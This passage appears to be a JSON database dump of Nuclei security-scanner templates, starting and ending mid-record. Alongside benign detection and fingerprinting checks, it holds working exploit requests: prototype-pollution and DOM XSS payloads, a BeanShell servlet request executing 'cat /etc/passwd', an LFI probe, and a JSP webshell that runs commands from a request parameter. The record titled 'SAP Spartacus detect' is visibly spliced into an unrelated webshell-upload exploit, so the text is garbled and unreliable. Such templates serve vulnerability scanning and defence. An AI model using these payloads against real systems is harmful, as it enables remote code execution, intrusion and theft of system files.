function getStackTrace() {\n var stack;\n try {\n throw new Error('');\n } catch (error) {\n stack = error.stack || '';\n }\n\n stack = stack.split('\\n').map(line => line.trim());\n 
return stack.splice(stack[0] == 'Error' ? 2 : 1);\n }\n\n var oldSender = window.postMessage;\n\n window.postMessage = (data, origin) => {\n if (origin == '*') {\n logger({stack: getStackTrace(), args: {data, origin}});\n return oldSender.apply(this, arguments);\n }\n };\n }\n\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n - action: waitload\n\n - action: script\n name: alerts\n args:\n code: |\n () => { window.alerts }\n\n matchers:\n - type: word\n part: alerts\n words:\n - \"at window.postMessage\"\n\n extractors:\n - type: kval\n part: alerts\n kval:\n - alerts\n# digest: 4b0a0048304602210086257806d07e03db948397827002ce802d2268c9b897c1a4e71ade20b22b222202210094f84b0a083d95efd50b36f5fd9765eae6ccb657332c21af2ded2d6f754bce13:922c64590222798bb761d5b6d8e72950", "hash": "7ffd643432025f293be69cb6ef4b69e1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfb" }, "name": "postmessage-tracker.yaml", "content": "id: postmessage-tracker\n\ninfo:\n name: Postmessage Tracker\n author: pdteam\n severity: info\n reference:\n - https://github.com/vinothsparrow/iframe-broker/blob/main/static/script.js\n tags: headless,postmessage\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: response\n key: Content-Security-Policy\n value: \"default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;\"\n\n - action: script\n args:\n hook: true\n code: |\n () => {\n window.alerts = [];\n\n logger = found => window.alerts.push(found);\n\n function getStackTrace() {\n var stack;\n try {\n throw new Error('');\n } catch (error) {\n stack = error.stack || '';\n }\n\n stack = stack.split('\\n').map(line => line.trim());\n return stack.splice(stack[0] == 'Error' ? 
2 : 1);\n }\n\n var oldListener = Window.prototype.addEventListener;\n\n Window.prototype.addEventListener = (type, listener, useCapture) => {\n if (type === 'message') {\n logger(getStackTrace());\n }\n return oldListener.apply(this, arguments);\n };\n }\n\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n - action: waitload\n\n - action: script\n name: alerts\n args:\n code: |\n () => { window.alerts }\n\n matchers:\n - type: word\n part: alerts\n words:\n - \"at Window.addEventListener\"\n\n extractors:\n - type: kval\n part: alerts\n kval:\n - alerts\n# digest: 490a0046304402203e9bd9f021bbf2a081ac817e6f8381e39f6507e40a22659ebed4a8402fea0d1202204f1d217045fc3577876bf20765baa2c6880a41fbf940c426dbdd2d96289e04e1:922c64590222798bb761d5b6d8e72950", "hash": "52193328f920be5a9c855127bfb94801", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfc" }, "name": "prototype-pollution-check.yaml", "content": "id: prototype-pollution-check\n\ninfo:\n name: Prototype Pollution Check\n author: pdteam\n severity: medium\n metadata:\n max-request: 4\n tags: headless\n\nheadless:\n - steps:\n - args:\n url: \"{{BaseURL}}?constructor[prototype][vulnerableprop]=polluted#constructor[prototype][vulnerableprop]=polluted\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract\n words:\n - \"polluted\"\n\n - steps:\n - args:\n url: \"{{BaseURL}}?constructor.prototype.vulnerableprop=polluted#constructor.prototype.vulnerableprop=polluted\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract2\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract2\n words:\n - \"polluted\"\n\n - steps:\n - args:\n url: \"{{BaseURL}}?__proto__[vulnerableprop]=polluted#__proto__.vulnerableprop=polluted&__proto__[vulnerableprop]=polluted\"\n action: navigate\n\n - 
action: waitload\n\n - action: script\n name: extract3\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract3\n words:\n - \"polluted\"\n\n - steps:\n - args:\n url: \"{{BaseURL}}?__proto__.vulnerableprop=polluted\"\n action: navigate\n\n - action: waitload\n\n - action: script\n name: extract4\n args:\n code: |\n () => {\n return window.vulnerableprop\n }\n matchers:\n - type: word\n part: extract4\n words:\n - \"polluted\"\n# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950", "hash": "30d1e771dc94e12b726d31568f6bb962", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfd" }, "name": "screenshot.yaml", "content": "id: screenshot\n\ninfo:\n name: Headless Http Screenshot\n author: V0idC0de,righettod,tarunKoyalwar\n severity: info\n description: Takes a screenshot of the specified URLS.\n tags: headless,screenshot\n\nvariables:\n filename: '{{replace(BaseURL,\"/\",\"_\")}}'\n dir: \"screenshots\"\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: request\n key: \"User-Agent\"\n value: \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:111.0) Gecko/20100101 Firefox/111.0\"\n\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n - action: screenshot\n args:\n fullpage: \"true\"\n mkdir: \"true\"\n to: \"{{dir}}/{(unknown)}\"\n# digest: 4a0a0047304502202e94bb4f26333b96b0b5f2a09120b689263d739676bafd999b1318bb9e8bcc06022100bbcc54afafcc8bc7d592f01439cfdddba54c245bf35081b3a00302bc2d6d6f1c:922c64590222798bb761d5b6d8e72950", "hash": "7024a9ec5e50a024431daf42186de68f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dfe" }, "name": "window-name-domxss.yaml", "content": "id: window-name-domxss\n\ninfo:\n name: window.name - DOM Cross-Site Scripting\n author: pdteam\n severity: 
high\n description: The window-name is vulnerable to DOM based cross-site scripting.\n reference:\n - https://public-firing-range.appspot.com/dom/index.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cwe-id: CWE-79\n tags: headless,xss,domxss\n\nheadless:\n - steps:\n - action: setheader\n args:\n part: response\n key: Content-Security-Policy\n value: \"default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;\"\n\n - action: script\n args:\n hook: true\n code: |\n () => {\n window.alerts = [];\n\n logger = found => window.alerts.push(found);\n\n function getStackTrace() {\n var stack;\n try {\n throw new Error('');\n }\n catch (error) {\n stack = error.stack || '';\n }\n stack = stack.split('\\n').map(function (line) { return line.trim(); });\n return stack.splice(stack[0] == 'Error' ? 2 : 1);\n }\n window.name = \"{{randstr_1}}'\\\"<>\";\n\n var oldEval = eval;\n var oldDocumentWrite = document.write;\n var setter = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;\n Object.defineProperty(Element.prototype, 'innerHTML', {\n set: function innerHTML_Setter(val) {\n if (val.includes(\"{{randstr_1}}'\\\"<>\")) {\n logger({sink: 'innerHTML', source: 'window.name', code: val, stack: getStackTrace()});\n }\n return setter.call(this, val)\n }\n });\n\n eval = function(data) {\n if (data.includes(\"{{randstr_1}}'\\\"<>\")) {\n logger({sink: 'eval' ,source: 'window.name', code: data, stack: getStackTrace()});\n }\n return oldEval.apply(this, arguments);\n };\n\n document.write = function(data) {\n if (data.includes(\"{{randstr_1}}'\\\"<>\")) {\n logger({sink: 'document.write' ,source: 'window.name', code: data, stack: getStackTrace()});\n }\n return oldEval.apply(this, arguments);\n };\n }\n\n - args:\n url: \"{{BaseURL}}\"\n action: navigate\n - action: waitload\n\n - action: script\n name: alerts\n args:\n code: |\n () => { window.alerts }\n\n matchers:\n - type: word\n part: alerts\n words:\n - 
\"sink:\"\n\n extractors:\n - type: kval\n part: alerts\n kval:\n - alerts\n# digest: 490a004630440220440ff260d9c59333dc1481acd3df4e4c68997bb43f6834f8e0dc24f522d7bbc3022038a8a9ab98ef7c71a0f749a408a2bc682fd38954282666b671651ee2df5f77c5:922c64590222798bb761d5b6d8e72950", "hash": "1a8f68439850614632c31a54a22ccd94", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dff" }, "name": "CVE-2018-25031.yaml", "content": "id: CVE-2018-25031\n\ninfo:\n name: Swagger UI < 3.38.0 - Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: |\n Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.\n remediation: |\n Update to the latest version of the Swagger UI (^4.13.0 or higher) to mitigate the vulnerability.\n reference:\n - https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-25031\n - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3506\n - https://github.com/swagger-api/swagger-ui/issues/4872\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2018-25031\n cwe-id: CWE-20\n epss-score: 0.00265\n epss-percentile: 0.65516\n cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: smartbear\n product: swagger_ui\n shodan-query: http.component:\"Swagger\"\n fofa-query: icon_hash=\"-1180440057\"\n tags: headless,cve,cve2018,swagger,xss,smartbear\nheadless:\n - steps:\n - args:\n url: 
'{{BaseURL}}/index.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Byb2plY3RkaXNjb3ZlcnkvbnVjbGVpLXRlbXBsYXRlcy9tYWluL2hlbHBlcnMvcGF5bG9hZHMvc3dhZ2dlci1wYXlsb2FkIgp9'\n action: navigate\n\n - action: waitload\n\n - action: script\n args:\n code: |\n () => {\n window.originalAlert = window.alert;\n window.alert = function(message) {\n window.alertTriggered = true\n }\n }\n\n - action: sleep\n\n - action: script\n name: alerts\n args:\n code: |\n () => {\n return window.alertTriggered\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: alerts\n words:\n - \"true\"\n\n - type: word\n part: body\n words:\n - \"swagger\"\n case-insensitive: true\n# digest: 4b0a004830460221008c5bb8afdc142dbf782c9bb579a7ed08079c67387a1285aaa34a20bd5f67a8e9022100905594915fd641bd07174ef818dd215bc18bc32845731f1aeb85ca745c8612e2:922c64590222798bb761d5b6d8e72950", "hash": "825586eacc14a4b3bb9e5941017e2baa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e00" }, "name": "js-libraries-detect.yaml", "content": "id: js-libraries-detect\n\ninfo:\n name: Common JS Libraries - Detection\n author: adamparsons,cbadke,ChetGan,ErikOwen,jacalynli,geeknik\n severity: info\n description: Checks a target web app for inclusion of common JavaScript libraries\n metadata:\n max-request: 1\n tags: headless,tech,js\n\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n - action: script\n name: fingerprintAxios\n args:\n code: |\n () => {\n //check for axios\n if (!window.axios) {\n return \"\"\n }\n\n try {\n // check for version\n // only works on some websites\n return window.axios.VERSION\n } catch (e) {}\n\n return \"Version not found\"\n }\n\n - action: script\n name: fingerprintBootstrap\n args:\n code: |\n () => {\n try {\n // if not using jQuery\n return bootstrap.Tooltip.VERSION || \"\"\n } catch (e) {}\n\n try {\n // if using jQuery\n return 
$.fn.tooltip.Constructor.VERSION || \"\"\n } catch (e) {}\n\n return \"\"\n }\n\n - action: script\n name: fingerprintJQuery\n args:\n code: |\n () => {\n let version = \"\";\n try {\n if(window.jQuery) {\n version = jQuery.fn.jquery;\n }\n if(window.$) {\n version = $.fn.jquery;\n }\n version = version.replace(\".min\", \"\");\n version = version.replace(\".slim\", \"\");\n return version;\n } catch (e) {}\n\n return \"\";\n }\n\n - action: script\n name: fingerprintLodash\n args:\n code: |\n () => {\n try {\n return _.VERSION || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintMomentJs\n args:\n code: |\n () => {\n try {\n return moment.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintReact\n args:\n code: |\n () => {\n try {\n return window.React.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintReactDOM\n args:\n code: |\n () => {\n try {\n if (window.ReactDOM) {\n return window.React.version || \"\";\n }\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintAngular\n args:\n code: |\n () => {\n\n try {\n // Angular Version 1\n return angular.version.full\n } catch (e) {}\n\n try {\n // Angular Version 2+\n return getAllAngularRootElements()[0].attributes[\"ng-version\"].value\n } catch (e) {}\n\n return \"\"\n }\n\n - action: script\n name: fingerprintBackboneJs\n args:\n code: |\n () => {\n\n try {\n return window.Backbone.VERSION || \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintEmberJs\n args:\n code: |\n () => {\n try {\n return Ember.VERSION || \"\"\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintVue\n args:\n code: |\n () => {\n\n //method 1 (simple)\n try {\n return Vue.version\n } catch (e) {}\n\n //method 2 (checks if Nuxt exists)\n try {\n const nuxtDetected = Boolean(window.__NUXT__ || window.$nuxt)\n if (nuxtDetected) {\n let Vue\n }\n if 
(window.$nuxt) {\n Vue = window.$nuxt.$root.constructor\n }\n return Vue.version\n } catch (e) {}\n\n //method 3 (go through all elements)\n try {\n const all = document.querySelectorAll('*')\n let flag\n for (let i = 0; i < all.length; i++) {\n if (all[i].__vue__) {\n flag = all[i]\n break\n }\n }\n if (flag) {\n let Vue = Object.getPrototypeOf(flag.__vue__).constructor\n while (Vue.super) {\n Vue = Vue.super\n }\n return Vue.version\n }\n return \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintDojoJs\n args:\n code: |\n () => {\n try {\n return ([dojo.version.major, dojo.version.minor, dojo.version.patch].join(\".\"))\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintDomPurify\n args:\n code: |\n () => {\n try {\n return DOMPurify.version || \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintModernizr\n args:\n code: |\n () => {\n try {\n return Modernizr._version || \"\"\n } catch (e) {}\n return \"\"\n }\n\n - action: script\n name: fingerprintD3\n args:\n code: |\n () => {\n try {\n return d3.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintThreeJs\n args:\n code: |\n () => {\n try {\n return THREE.REVISION || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintChartJs\n args:\n code: |\n () => {\n try {\n return Chart.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintSlick\n args:\n code: |\n () => {\n try {\n // Assuming Slick Carousel is used as a jQuery plugin\n return $.fn.slick.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n - action: script\n name: fingerprintSelect2\n args:\n code: |\n () => {\n try {\n // Assuming Select2 is used as a jQuery plugin\n return $.fn.select2.version || \"\";\n } catch (e) {}\n return \"\";\n }\n\n matchers-condition: or\n matchers:\n - type: dsl\n dsl:\n - len(fingerprintAxios) > 0\n - len(fingerprintBootstrap) > 
0\n - len(fingerprintJQuery) > 0\n - len(fingerprintLodash) > 0\n - len(fingerprintMomentJs) > 0\n - len(fingerprintReact) > 0\n - len(fingerprintReactDOM) > 0\n - len(fingerprintAngular) > 0\n - len(fingerprintBackboneJs) > 0\n - len(fingerprintEmberJs) > 0\n - len(fingerprintVue) > 0\n - len(fingerprintDojoJs) > 0\n - len(fingerprintDomPurify) > 0\n - len(fingerprintModernizr) > 0\n - len(fingerprintD3) > 0\n - len(fingerprintThreeJs) > 0\n - len(fingerprintChartJs) > 0\n - len(fingerprintSlick) > 0\n - len(fingerprintSelect2) > 0\n extractors:\n - name: axios\n type: regex\n part: fingerprintAxios\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: bootstrap\n type: regex\n part: fingerprintBootstrap\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: jquery\n type: regex\n part: fingerprintJQuery\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: lodash\n type: regex\n part: fingerprintLodash\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: moment\n type: regex\n part: fingerprintMomentJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: react\n type: regex\n part: fingerprintReact\n regex:\n - 
^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: reactdom\n type: regex\n part: fingerprintReactDOM\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: angular\n type: regex\n part: fingerprintAngular\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: backbone\n type: regex\n part: fingerprintBackboneJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: emberjs\n type: regex\n part: fingerprintEmberJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: vuejs\n type: regex\n part: fingerprintVue\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: dojo\n type: regex\n part: fingerprintDojoJs\n regex:\n - ^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: dompurify\n type: regex\n part: fingerprintDomPurify\n regex:\n - 
^(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: modernizr\n type: regex\n part: fingerprintModernizr\n regex:\n - ^(0|[1-9]\\d*)(?:\\.(0|[1-9]\\d*))?(?:\\.(0|[1-9]\\d*))?(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$\n\n - name: d3\n type: regex\n part: fingerprintD3\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)(?:-((?:0|[1-9]\\\\d*|\\\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\\\.(?:0|[1-9]\\\\d*|\\\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\\\+([0-9a-zA-Z-]+(?:\\\\.[0-9a-zA-Z-]+)*))?$\"\n\n - name: threejs\n type: regex\n part: fingerprintThreeJs\n regex:\n - \"^(0|[1-9]\\\\d*)$\"\n\n - name: chartjs\n type: regex\n part: fingerprintChartJs\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)$\"\n\n - name: slick\n type: regex\n part: fingerprintSlick\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)$\"\n\n - name: select2\n type: regex\n part: fingerprintSelect2\n regex:\n - \"^(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)\\\\.(0|[1-9]\\\\d*)$\"\n# digest: 4a0a00473045022079533719529f55f1e51b1f116812923cef7ec5a3a85d88e782a3fcefe130d627022100967c15f1e6ec4fdc6fead7fdbc0944e6e33903ff5827f60a5e3fbf42668a1743:922c64590222798bb761d5b6d8e72950", "hash": "5c59bcb930db02a4e6e6f60f54b1a5b4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e01" }, "name": "sap-spartacus.yaml", "content": "id: sap-spartacus\n\ninfo:\n name: SAP Spartacus detect\n author: TechbrunchFR\n severity: info\n description: Spartacus is a lean, Angular-based JavaScript storefront for SAP Commerce Cloud that communicates exclusively through the Commerce REST API.\n reference:\n - https://github.com/SAP/spartacus\n metadata:\n verified: true\n tags: 
tech,sap,hybris,angular,spartacus,headless\n\nheadless:\n - steps:\n - action: navigate\n args:\n url: \"{{BaseURL}}\"\n\n - action: waitload\n\n matchers-condition: and\n matchers:\n - part: body\n type: word\n words:\n - \"<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\"\\n\");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\"x\".equals(request.getParameter(\"pwd\"))&&!\"\".equals(request.getParameter(\"{{randstr}}\"))){out.println(\"
\" +excuteCmd(request.getParameter(\"{{randstr}}\")) + \"
\");}else{out.println(\":-)\");}%>6e4f045d4b8506bf492ada7e3390d7ce\n - |\n GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_1, \"htmoffice operate\")'\n - 'contains(body_2, \"Windows IP\")'\n condition: and\n# digest: 4a0a004730450221009360315ece75ec5c9316007a233b61043694e13c5a244b98a6cd82b66123830302203191ef9220a5dce44e15568f6ae55424d1e76df6e730da4681b468967c70d4d6:922c64590222798bb761d5b6d8e72950", "hash": "92f491141091d260a440f38d06080997", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e07" }, "name": "CNVD-2019-32204.yaml", "content": "id: CNVD-2019-32204\n\ninfo:\n name: Fanwei e-cology <=9.0 - Remote Code Execution\n author: daffainfo\n severity: critical\n description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. 
Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.\n reference:\n - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cwe-id: CWE-77\n metadata:\n max-request: 1\n tags: cnvd,cnvd2019,fanwei,rce\n\nhttp:\n - raw:\n - |\n POST /bsh.servlet.BshServlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n bsh.script=exec(\"cat+/etc/passwd\");&bsh.servlet.output=raw\n\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n# digest: 490a0046304402207065e9f47b12777fafbb246012afc4d06af471f3452a72e630d193448e4edfea0220281da2b0b896fdfba7eb51cd6a63c08c8eca2b5946ea1058191f31c631d03157:922c64590222798bb761d5b6d8e72950", "hash": "5a2a46f4cef1d7f44c690dc093c795ae", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e08" }, "name": "CNVD-2020-23735.yaml", "content": "id: CNVD-2020-23735\n\ninfo:\n name: Xxunchi CMS - Local File Inclusion\n author: princechaddha\n severity: high\n description: Xunyou CMS is vulnerable to local file inclusion. 
Attackers can exploit this vulnerability to obtain sensitive information.\n reference:\n - https://www.cnvd.org.cn/flaw/show/2025171\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cwe-id: CWE-22\n metadata:\n max-request: 1\n tags: cnvd,cnvd2020,xunchi,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"NzbwpQSdbY06Dngnoteo2wdgiekm7j4Ndisplay_errors\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fda563ee34984f37958ad8386737f26a2389c08b07b2b7b3a2df1730edc5b425022100c6379ed23eed0835d0b8f53aff95b36b4c498b113965558e3996844f26e59b75:922c64590222798bb761d5b6d8e72950", "hash": "433b74cca5c0cec7ae4bce74f35ec8ca", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307e09" }, "name": "CNVD-2020-26585.yaml", "content": "id: CNVD-2020-26585\n\ninfo:\n name: Showdoc <2.8.6 - File Uploads\n author: pikpikcu,Co5mos\n severity: critical\n description: |\n ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. 
